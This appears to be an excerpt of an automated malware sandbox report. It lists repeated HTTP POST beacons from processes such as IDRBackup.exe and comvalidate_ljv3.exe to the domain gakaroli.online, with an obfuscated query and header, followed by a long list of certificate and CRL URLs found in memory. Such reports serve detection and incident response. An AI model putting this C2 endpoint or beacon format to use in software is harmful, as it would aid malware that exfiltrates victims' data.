                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 53Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 208Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 103358Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 745Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 212Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 380Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 29465Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 104764Host: gakaroli.online
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0Content-Length: 35Host: gakaroli.online
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: gakaroli.online
                      Source: unknownHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15Content-Length: 96Host: gakaroli.online
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://ascstats.iobit.com/base-info.php
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2411731136.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2431217978.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2508050889.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigning-g1.crl03
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
